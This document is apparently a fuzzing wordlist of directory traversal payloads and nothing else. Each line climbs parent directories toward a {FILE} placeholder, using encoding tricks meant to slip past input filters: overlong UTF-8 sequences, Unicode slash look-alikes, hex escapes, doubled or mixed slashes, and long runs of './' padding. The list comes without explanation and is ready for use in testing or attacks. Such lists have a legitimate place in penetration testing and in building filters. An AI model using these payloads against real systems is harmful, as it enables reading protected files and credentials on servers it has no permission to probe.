..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
